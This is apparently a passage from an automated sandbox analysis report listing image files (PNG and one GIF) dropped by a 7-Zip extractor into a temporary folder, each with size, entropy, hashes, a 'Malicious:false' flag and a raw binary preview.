.... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... .... ....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 280 x 450, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10718
      Entropy (8bit):7.659291940980214
      Encrypted:false
      SSDEEP:
      MD5:0A0CD2FBBBF4AFB72C90CD61523AE85B
      SHA1:C829C09E0FE408188EE51491C5101E4F629D8CAC
      SHA-256:2782BBFD7F0004AE7E1C32DB08506E7D7944307BB23E017FFE202C0410ADD6F8
      SHA-512:22102DD36DFCBE929DFCCD7954C750FD16DE211228DF6B576328468327ABBD279C67A43D04314EB25B25F8FF75BED3F18BAFEA121E2C155F8331F6ACB148AC94
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............4+......sRGB.......).IDATx....x.....w7.U:R...4A@...@...X.....P......U......^...) *.."...&M..K...~.e..d7.$..f..Y..93..x9s.......@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 280 x 450, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):9452
      Entropy (8bit):7.518393246860436
      Encrypted:false
      SSDEEP:
      MD5:68D48DB619643E7308D08C20DEDD11E0
      SHA1:4AFD19AD47BA75A3D6EC9BE6C0C1CDE5837C6887
      SHA-256:52F882BFF93710740312E9A3BB88E09B46778A1BCD15CAC150D6E68FFCCD1714
      SHA-512:07079DD1359BC1509116BFB295BD603385DFAD09F704EAC5C163D7D63BCBA13345DF3445DFB854778DCBAB8AC0EF7EF86BA3AEED79FC1BA629437A371B19EC52
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............4+......sRGB.......$.IDATx.....$U}..z.7o.....z.H0..........ET@P...1"(..E.4n@....-.<.P.B.@ .3....{..{of...L7...^.........>U..[.n...:..@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@....@..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):47982
      Entropy (8bit):7.980537615410833
      Encrypted:false
      SSDEEP:
      MD5:C41BF32F895D2F68A59FD422B660CB67
      SHA1:CDD33644147A7589454487E15E078CBE28BA1C20
      SHA-256:AAA6A8C716D464BA5572F3F5D449F16FA77E732AB7043DA9FAD5968B65F37457
      SHA-512:558D5A485566CA0431A7E557BB1C29D50B09C96BC7845C5CA48664F7033171893A75F7C48802BD37DC5E26BBF4DF4EC22883AA0BC46309032CBA8E1F474B1C30
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx..}.|.....mZ.z.l.Ir/.W..6.b..cZB....#.@.I...I ..j(....c.(....E.lY.d...>.}..mZm..j%...j..zfw.....p..p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.....G.#....p.8.}...o....#.....?....>W-X.m..l.hV....L...uKY......1G.g..$.gp.r.8.......uYR..8...P..|.`.D...L....6.....X..&A@%.. T.....aQ......<?.......'Y...sq.8
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 1202 x 624, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):65370
      Entropy (8bit):7.82315145499376
      Encrypted:false
      SSDEEP:
      MD5:A3DDB5B8AB4D3A5EB936E0D0D6C7FDAB
      SHA1:88B1F9EB402284A669FC8CBAD7E4B26E150AA78E
      SHA-256:5932DDE8140CE6D9994AD3E3BB780726A9AEC8B62DE9267EB113C3C1DCFC2056
      SHA-512:805126ACA4843CBB3FAC6E36A8844B5F76142F02B8DA5F822669EC75688F680DFBBA71D557E2DC6E83F6C2F23D85A00D9A2CEAE5A7477F15A02EC5A054940541
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......p.......H|....sRGB.......@.IDATx.....$U}.._U_3.=...r-. .,....+..g< ..(.g4...O4jL4.....1........&...{...;{...\}U....Y.........tO..~.S=k.o.{e.... .... .@.............".."V.....Gt.j..("....t.... .... ....`@....@............~n*q5s..X..K..$.f..... ................@.... 04<z.+r..|.^~8..[.w..K.\....... ........:].'. .... .@0..4B.6xWeI,.'.W.!....f......@.......#...L+. .... ..f$.v.a.......u>.GU. .... .@....j.KE.. .... .l.....g$.I,.....%.Y.}]......@....@....`jas\'.D....@..&..H..~'...#.M.A.. .... .@..$..&....@....@`..-......H.{.Z[:e..k....@....@...Hd5.."Z..@....h..W.Kj..>..s.....@....@.. .....U!&..@....h~...'..n3....\.k...@....@........5!"..@....hr....-.....J...Z.O.. .... .@..$....<.. .... 0..>U....k.S;..g?.. .... Po..Y...=..@....hy.G..:u.:.C3. .... .@ .Hd..2.... .... P....U.._.G... .... .@m.Hd..Z.@....@...Bb?R........@....@...."@"+(W.8.@....@.e.\qv.Lg.... .... . ..Y........ ....!0..H\w......mP?.. .... .$..YA...... ...-#.Z.........K.e.c.\.:.... ..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 1202 x 624, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):61729
      Entropy (8bit):7.796024925410221
      Encrypted:false
      SSDEEP:
      MD5:5B614C6010490D1D3B9315BC7EADC3F4
      SHA1:4AFC7F027E1ACCF09F8B89D3755F5D4DD61091B8
      SHA-256:E31D65CE330F6C1233657A74EBA1CC098BC837E18014493A5703AD45A6272AC7
      SHA-512:E63F152E56190A26697F19296F9CA32F507C3BEDEE472AD83A3A75AB8D12C924D193A9099AA89D201609F75D33A35262834CCE2BC8E8D1354B1AA19532D04123
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......p.......H|....sRGB.......@.IDATx...`.....6I.+ieKr.W.+..x4..G ..GhI =...$...@..PB..y.....P.:.P.$.....m\d.[}.m3......J;.;.3..]#.;s...fv5...*... .. .. .. Pp.;...I.... ....j....W.M...G..E".oC...............`............(..............*.\..!hef.. .. .. ...O.BV..c...@..@..@...Z.{......kF.....'F..d..-@..@..@..@.x...3....@..@..@...I@N#.i./.&b.1).<..a......+..........(..Dd..3z.........(Q.2........v]$....................,..*8.. .. .. .6...}3..b.K&r7.($......g..@..@..@..@...0.....^...........@..+...$....].............@.. d...@..@..@..@`4....#y...E...).g.o..@..@..@..@.]. d..x.[..............e......V.m..........p"..YN<*...@..@..@........+2*K...X................c..@..@..@..\N...BE..z.).,.....A..@..@..@ [....%.. .. .. .. ....*h.*.cu.......v..........(4..Y.&..@..@..@.....Ntd....@.............p...Y.8.p..@..@..@...'.y......gh.. .. .. ......e.WX.........(a..RW.b..r.B.>@..@..@..@.). d9.H............! H.(..` .. .. .. . ....t0..........@q........V.F!.....}......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 140 x 78, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3091
      Entropy (8bit):7.925574875494764
      Encrypted:false
      SSDEEP:
      MD5:27B0F8C32A011C9853802B2D0E792AB4
      SHA1:F08BFA3815C0146EF2F9E5B52B0B5E50394559D9
      SHA-256:25A35D7BE94F36E6137C2A35469F844444F1F31A2E305176209A22F1E1DBEC72
      SHA-512:76A00C259215E841BC63F257004D6581807A91758A5127E5904F2D765C5362623C30134CA36CCA2688ECAE0BCDDB5236FEEF793651BE5E8C71C6C18B7D1E4898
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......N.............sRGB.........IDATx..\ml.G.~g.n..>.%.Hj;N.4...vB..*.Q..!. ..%....... .Ul@%E....E.../D......*IDBR..I..)..6I...............n....oF..wf.}.wfgf..;..G.#....p.8.....G.#....p.8...r @.Q....;...........F.....m.1!j...W.h.Q7..P:....|.K..?c*RQQN...]y...v......1".8....I%..(4..#..2...a.D$.%.......U._.Q>x..B..l&...P...DjDS|J. .~...FJ...T$a"W.>,D]G!.....{...5[%....S.Q..h.a......S.gD...v......X......UC.7!..Xp_...MA.!..k.8k.0.(...kBD..w..U.hu....F..E....p....@.f.........Ml.\.,......x_$$.0/.u.H..^g..*1.zd....2.=....J7./..#.J.i..+]a..K............K...d...".-..S.SG...._..Gux|.a.pP.....5.....S.r.8.0./.rW..j...E.qR...x...4A.A.&b...EO ....}.nW.....z....1C..B..$C.8.N,....7...I..$..|)........n9....C..g....r.q.a. ...H.......X...#.K.*.h......R.=.."d..v.D)......I.@P..t.......iN.3.b5...>:.....tO. L.....)..Z..Z...!e.np7+.[N...E}.*J-K...R.....g.u?.1...1.r.Z.*=...b.....G3.%.TBN]......H....l..\n....j."K...XP...;.l..!.C..2..6.x.#.7.cuf...6.E.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 140 x 78, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3465
      Entropy (8bit):7.927142279284809
      Encrypted:false
      SSDEEP:
      MD5:48E2F5E591E64335D443F15A40981130
      SHA1:9FBAC7326A637E3BF298A9F360966AE87D14CB6B
      SHA-256:83304CE37BE95920862947565F8BEB072DFB8785E9517ABDB01E0693FAC9030E
      SHA-512:7CB58F73CFEC87A55138182FF572D1911DE34ED57D851C890CDC75C269B354E748DC790F96E880F15022F070424874D41C3388F2CB1501148339A8BE75027BFF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......N.............sRGB........CIDATx..\..T..........}/.....,.....b....U!)jU..Mk.....ib....>j.....l#....]Q.]..~.cw....w.../.Y.K.I.....s.7........"........@@ ...........@@ ...........@@ ...........@@ .Hj.......x./.gW.[...2Z......E.....h...2..Y.P....0....J)........$.M..i.$l.....d....,X..fY....%...$...7%]i....@...=...0...$.W.8.5.....l....o..-}}.....f...`Ay9.....^7..('..]j.-W_..17....@........Fp...].0..`-+...M....T;#.......Zi..,|.l0.9.d4.RV8....2..jx#..@...O..K.3[...."......&,.5..+A.k..RM..5..9V.x.F..Z*>#..G.<.v.....r...{.V.JB.N...M.....?>M.o..n4.}.......'.2..K....^....Kd..../...B.....U+$qF7..:.fc,.....-......";..x..oo.[.W.:X...{..r.....~M........*.M.G....kQ....W.)..`.............#a.~^..^+%oF7.s.!|....B./V.....p..0......A.0.%.1Qy...$P7.V.7........>-.......].>.......nl...%.X8....E..<.....#$(....h.........S.eR7~......{..S....'k.rb..a.kc0..w(r.Ir.w.......u..X.w.s3..3.1..5.M";..|&H^......-S....p.kx.{.6..2...s.5-...%.r.1...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 140 x 78, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2450
      Entropy (8bit):7.8838967987552495
      Encrypted:false
      SSDEEP:
      MD5:B50016092FD1DC84AEC9F28271DB94FB
      SHA1:E5E7DEDA6F7E64AAE82BF3EBB53E2CE4F165FCBE
      SHA-256:5D1838B6C13555D3270FB122BEEA34660FC87C168D101AE6846371814B461D95
      SHA-512:609D96FE99F0A8FD79ADC8E5795EFCC2231F0AD13792118D09A20D263A9B7BA7D7A8996DAC56E29C33501108AC22634FA3207BCEC1E3C413997925805A983294
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......N.............sRGB........LIDATx..]kl.W.>..].z.~..dKb'mL..4rB..D*.(...G...H....A.R...S@"U......!.....!.jED...(.k.$vj.N.^{.3.;.]...}{w..=.x.{..o.=s.......C.!..`.0.......C.!..`.0.*D..0.KV...G...z.Q..}g.]-!..M.aj|..<1..@.YQ.......'A..zA8.:{i*OOU.....+..........$.v..R.......).K7......1.g..t...H\x.h.l...+.I./.......?\.UY&.Ke._Q.*)....B+i.........t.0..!L...TY+V)."P.oC...U.....h...x.(..D.(M.$....?.|\...|J.t........V+@"*...5!.bA*SR=$./.,....<\[I....s!Rs..H...#;t..G...i.S......)1.=L.....K.'z\.n1B...._K6.&g...{..Y.....`f..>......$@....=...&..B.".tQ.?.0J..+'Qx%.dV......d.(4l.....I8R.$.pB<...j...I[G....1t/....\;[.0;;..]..k1.d.\.......R).,.]~pv.aivQ.'~Lh)...^......./-..QI$...E8.S..oU"..D.U.Z...Z.kW...7oJ.!..b...,.~3......0X._.2Qy...(</c.]P.l....Z>V.|y......"ran.!p...>...R<....x...*gX( ..j.u!.5..A..F....l....b.2.shh............@._.q-...s.....\...ip..`2..<./!_.~.n,....t........p..j..%`ww.b).......G.....|..A2.....en.`k..z\q.H.).......
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 140 x 78, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3568
      Entropy (8bit):7.912808247231247
      Encrypted:false
      SSDEEP:
      MD5:3A992299176DD2E401EDA3F07BFD7A9A
      SHA1:E977EB97CD7F03F3B024EFF6B7E151DB3665A09D
      SHA-256:5737AAB6AC713685386D6E2094EA82705025DF8DA9A913FE148313355117B5D7
      SHA-512:C23762C8FDE9600D2450F23C8C506CF86A840E147A2C3AA9A126D51BE428159F176F4428F5471ACA2DFDF847A841BC21747892FBECC076CD5C7CE4B4AE2A1333
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......N.............sRGB.........IDATx..\yl.....c/..+6...!..Ml......@J.....R..AJZH@.ZU..ZU.......P).....P..M.J...@..l..2.w...3.......f.N.$..............w-..............................................l....N.......`.0..!.Za...@7#.pEw.&.....f...nvy.?.<.+...c....HGwh.re.I....|..W..91.{.qtj....r......h...2.-aB..&...D&..gfh.d;...$Mu.....0..<c:.LIG....H..-Y..b.$.._...)..P5#2..."....U2....L.f.[.F.....i]..IP..\.(.Cy}..b.*.Z....$.M..a..b.0..00o.8*Q.:$..[.".B..X.....y....=.g..R....8...>0......"=.......?.f;.|...w|..3.\..mI.."'.H.. ....).c>P<).E< Q...ZQ...U...n...y.(.......g...-..'.6..M.P....%..........$ 1..jI.)4.......$O..h{z.m...g...z......iV.H.P...f5al.'!....g..-...........A/0.gD..\.S\0D.'..vg...;!...+|.dru.H.~.8j.4y.y.vY.4.$L.Os<.....X.H..9.V&.@.\./s..a..."h...V.*+dt.RT'.J.&.8.R...Z..C.[.Ws.}..=J=nK.Jq{...r&O.$...<.....TOX..:$.).9..;u(.2Z....p..c...>F..8M..!.S}...-`j....%L.7.....^2...eQ(.G....."...x.Y.../d].. ..S...-.K....CS&..`.O.88..7
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 140 x 78, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2098
      Entropy (8bit):7.8246497789813265
      Encrypted:false
      SSDEEP:
      MD5:C140E1AF7C8647D7350A0E063508541E
      SHA1:72813D3AD5D6D41BF67E4F73B07A28B73122A323
      SHA-256:56A3A584BFFB915CC4E823553C62AC86776A4FDF65B5E47B8F9881EC2303283E
      SHA-512:959A47C9AF9E6CAAFB426C6B7E44418B2E3F21E106140FD9C356EB620C281FB46830779A93BBF978EEC326559AED483E91577CBCC4ACFFEBEE80112314146306
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......N.............sRGB........8eXIfMM.*.......i.......................................N.....{......IDATx..]]lTE.>s....v.-.R.....ZZ}.h....P..dT...`..F..'....._4..ML.h..B.......ZS..ZZ....{w.s.......vg.3M.wf.9.s....... ...".. ...".. ...".. ...".. ..!@..(.A?..K...&.........#..P..g.o.&.:v/..n.s..)W...S.Q.S}..2.D.XlVp:.`...{..oj.....O....g@...|v.......X{.?..........}y.SO>.I...G.y.d. .I....=@...N..N..*.tP_.............$=........!Q./..,...wo..=.~..:"P....4AUU.....xGG..dY....P...k...X<Y.B..E...CC.A.....@?..U..7.;w.n.-]930K.u..hO.R.=...o\=...}.^...C3#7n..`.....Al(..f.#.....p..%N&z........X.n2.v$.`.p..%....[j..OQHO ...g...T..*.fG.Y.(.i.3....\].,..l..4......%...g.......ZEQN#...F..(....v:m...h{.....B.....nu...n......C.6@.9.f........^.r...A......,.%....Y].....6e=.faX2....0.......O.......&CR..i...b."...x.|Cwc.F.w....B.....a....3....t.l+\.kK|.....Z...A....u.O0zDp...7.M..r.Ff.0..@.......d......A.ERd.e....g. .S.J.@..ru..uXd:$....a.'e}=.A....7B
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 140 x 78, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2954
      Entropy (8bit):7.900028451816773
      Encrypted:false
      SSDEEP:
      MD5:F474F1D30ABB0E8A67D2B51EE7831AB4
      SHA1:A9CD8117F9A44C8DC0E23C591077AB5344B2FC06
      SHA-256:26F9EEC473CD2B093BC8E7D44E847B4C6239C49390C7A51738E01EF48D1B3863
      SHA-512:4936D356840878637F385A7B56C43C59A4E074A22A0BCA302DC00B32F56038FEBF332E4AE973AD38B09BB4CA00BC595FF8648EF20152E9B8ABB535EC66315CDC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......N.............sRGB........DIDATx..][l.W......^.u.;........(.@Q....6*o..x...^.Z....x@.&.....V$.. B.n.."...%RI..m.I..z.3.3......w.v.x.G..3.s....9.Y.(D.D.D.D.D.D.D.D.D.D.D.D.D.D......z......U.0g|....Mb<'?49..Nw..0.....j..y....aO.8_..q9f.`.'oz..Ab.....~...40.].xsxS./..I$Q.B...~v.M$......&.*.....1.O.......-a..M......V.g(...../V....m2.;80.E TSr.....q.~..R..+.....,F..G:,^.Xd...Y(...C..\...u..p+.zC5...d.9....N...U...a.*....JR.9!....Lj.3.U..7.p..Rp...T@.b.t'...|..f.?C'a4.5..|...z!.).bL.... ..... ;$.C..M..9.....E..0...\..D.Jc..E6.k!..q6.LG.D.... .R.l.].J@..........0z.F.c..q.%.lK.V..+!.....v..0 ....`K..b.....L>R...3T..\.l.&z>`:j..........i".4"...O7.j.MR.;...G.E.p...m/.il+5..j...3].RS.l..b.*j.:6l.."VSC....a...0L..l..<..w.)...`...v.!..ZS...<.ZF`?.K..K....l.a&.BA..8<.5JI.c.6.1..Y.P.F.....s.......~>..|.U.-q.=/C.c5.8....*..3....'..g2..x..~.8qW.....<....;.......w.....X....h.6..0.n.. .`n..4...k..=&..v....XS..@E}'S._.:2.+.^V.Bm.b......S.h....?h...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):45069
      Entropy (8bit):7.970133150287087
      Encrypted:false
      SSDEEP:
      MD5:48A955C31326334978ED00C581AE0D1E
      SHA1:1E29909A81D69EE8C54C3F1AB7AF8EA8769D00E4
      SHA-256:62B3ACCBE359FF17A5FC6F8F5DB54AC60ABC4F01B77A8D7658656CD38C9D066B
      SHA-512:91E0D499FE21807F541FCCF54C34CC16C4C543CC04CE791EF8C2DD2E5585121E8977D055DD7AB1E6246D431C524FB6F3ED3C642DE18DF1DFE63581C1687F82A9
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx..}.`......eK.66.@(.L7.. /@..0$......NIy)/..B....K.M....S...\!4.^....$......H#..6i.:....-......7.{...A@.....A@.....A@.....A@.....A@.....A@.....A@.....A@.....A@.....l!..%H..... .k....j.i..c.+:r]......A ].l...r.. .... YjF.F.K....A@.....A@.....f...(+.D. ..... ..... ......B@l.........@..`././.i.l.....E.k...J..U4..7sX.......D@HV.^T. ........m.ee..T..M.U:..y.....y[.t.....A ..!Y.. ..+.v<.t... .VU.........@p...>E...5aFI....q....q.......A..y3..[.Z|.\84.........H=......O(!.3..kh..>w.....I.b)$.......l.... .....h......3kq.m.....O+..'X,....|...$XT.....\. .....H.......... 0..h.3X.V3...8...?R..RQ.'....".cV...4./... .D! $+..9....<F@.e...?...v...OVJ...[...TXb..q...:...q...ul....M...A@..@......A@.._.|.....wut.k'.S....M.......SkS.......8..U=..z7).....G....5>.yXa.....q..h.............z...k.....-...YG..1....j.B4..Wk.m..........r.......1|...]z-..k..R..R.{.!*..L.d'.z.1.1F.P...l..P......xF@H.x...wA`."..G......no..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 601 x 312, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):35015
      Entropy (8bit):7.968027828679342
      Encrypted:false
      SSDEEP:
      MD5:EA4FC7E11F7C74B274B474027E256EB1
      SHA1:17DF508B95C4C84CA02ECE6117FE77F82B284A71
      SHA-256:2A42FD5D700A444092CA9EDC99AB0162F5A22D4E0545998264F2C407A7782DB3
      SHA-512:C5673F03ED4AAE0396D30A2324E57BAA68A24CD8A13A7126BD40C7C768DC8609AA70137DEBE7DBC11FC0BAC89999DBC8F5111ACC5EE6DA98F76987F55CD7E821
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Y...8.....h..%....sRGB.......@.IDATx..}..$U.....r.7923.0C.$...ET...."AP..k.U\W.U.W1.(....U.. 9.....f.._~._...[..........\...[..{.W...:..s.81...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0...#..0..@." .`..K..#Pa..{`.!..k[..w5.\s.v{..&..6..K...*.p$..+Qo$..)..]..~.....+.+..#..0...`.e.*...0.V.....j.>.....Oi_.lZ...Z.@8......4....]..p.F..`.....2..M3...@.}o}....~\.....XG'..?...**...o.T......,.+0...#P...d..tn...E.:..BV..H....s.lt.....U...........ni.....0..@..`.UB..)F...h..f.=.s...2..}K.S.....k.Pdt4.>....3]..2...#Pb......1..@.!........of#X...@.z.q..[..g>.........F..(0.L...(.c.&.....u.MQ^.9...?XPhl....X.........Y.#..0..B.IV..d1..dB..WWK*.i..&Y......f.7.s.3...#P).0..;.z0.U..f.^...V......o...u.G......cF..`.....r..n...".`....9...B.U.........n...V..f...#`..&YV....$E../[f
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 610 x 322
      Category:dropped
      Size (bytes):232098
      Entropy (8bit):7.9278953616782015
      Encrypted:false
      SSDEEP:
      MD5:FD1B8D93EDF6577DF00FFA6DC5D23B6A
      SHA1:26B3AF48EA3E7F23A44F8237EEEB62AEE4846981
      SHA-256:1E6572064B87E1C1151C84F568B9DCB8B5E552EDE5B5DA45BE415F611A770D2C
      SHA-512:992B6538FA327CFE3B0F17D9C96C186DE535726B3D204BA575D28FB066F21B9A01ED872BF0C41A78A5FD820734116417FBC3B83CE909EF31AAF4B94FD32E37A7
      Malicious:false
      Reputation:low
      Preview:GIF89ab.B........KTc<...........X.......dddckw1<M.....]drL.....zzz................RZh.........}........................sz..............\\\.......................ppp.c....#Ff.......kr~...{..fmz......nnn...................................u....hhh.Nxi....Z..mt.(@Y.........=FVn..vvvI...n....Yanv}..~.8BR.......k.EN]..............AJZ......................___.......Dp.....s....._..........:DT...2f...............pw...................q.....5?O......?IXGP_.......m.......go{Mz..w.BKZ.................................................pt{.........#^.?[v>HW........._gt...ux.CL[...sss....................jjj......noq............ ....................................h....:CS.........]w.............0Lg...............]..{.....lll.....-.....x~..../9J.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="ht
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):165174
      Entropy (8bit):7.993129501279832
      Encrypted:true
      SSDEEP:
      MD5:33190F5FEECBAC2633DBC421C9157D37
      SHA1:15A70BDC57D0DFA16158B0CC60D2078ACDD3B5F1
      SHA-256:47EB6168309FE9A17E0829420461DD330C2105CE2B4383CCC31EFA04C2F5CCF8
      SHA-512:E150B311DA4EE4ADA497965D5B3FAFA49C49664A3123CE35551E79365F793D0EE961566B517C972F3C8C5297E99C064FF8E906F271F5080EE00F7D1E3FAE7B9A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...X...X......f......sRGB.......@.IDATx....e.u.X.u...9.f..9..# R....D...H..h{.]....W.die...^.dQ\....5mY.%Y..2.-.".A$.....s......[..{.{._.9...[U.N...v...W7.O..#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8...#..8.=@....>.#..l@...u.o.i.n.+........y.,.bb.93.B1.,..b....:1~
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):99472
      Entropy (8bit):7.988600301498744
      Encrypted:false
      SSDEEP:
      MD5:C0E163A0DC712F688A8BDBD0EC14324B
      SHA1:3D64F6B91BC4F7459CDA6A2E443ED184C6E64F36
      SHA-256:75D4299E45920344B4BC212A068D39E649F75B8811948B8122CF8F6180BEB98E
      SHA-512:F9C74ACCECEF8F7B626F55D889316381C533141678421600A9B90C76ED06AD4026B7154458EEFC7288E60388E19D13B8FE7FDF218AD8379B5002D0FD3E4E7E35
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...X...X......f......sRGB.......@.IDATx..]...U...m&.d.$.}_.!!B..d.E....Av....>..YDv.. ."<T....e.@..N.$.Lf...WO.T.t.TuWUW....S.{...2....R..a@.....a@.....c..J..rR..@?..0 ....00 ..k.}*.J..........`...a@......d`....(..o.).....u...a@.....Rd@.T.RUu...R._t...b`...i].....a...h..ZP..[..)z...1...\D+a@....."3...Y...-.-.>.|i1 .Vi=/.V.....a.#...2.M..".,.8/.fB....0 ....0....<....b]......R.X....`.\.+....0.?..cz.EUE.....W......z...........a@...t.`T.L.b%a`].x.b.a..1.l.%...a@........L1...a .[.........R.0 ....@.0.).v*'...N.`..6#..)j...m.......1...#.....0 ..b..E.`.\.'e..........l.L.&...L....Z.-.Y......W...5.0 ....0`...m]w.8j...X\.....t.....l...{2p.p6..0...U.d.....X`g.(....3^[....%.,<U.a@.....a...[11.Og#.@6,E.....:.z..O@......rJ8..z.e....@..........0 ....E...as....No.{S..8........r.Bu)2.G..w...q..D...z^..0 ....;...j....A..Y.x....\/..\).K.U.*`'.K9.....!....1.J....0 ....0.x .`s.....}.k.......J...P./.?.N.F.b..\............R.0 ....@.2..".rc..-.:.$
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):46477
      Entropy (8bit):7.909588932283159
      Encrypted:false
      SSDEEP:
      MD5:CB0CAAA4E7E5F48BE26BD645407E8EC8
      SHA1:1CC631EB2F041B279336A69FD5176B059FDE78CC
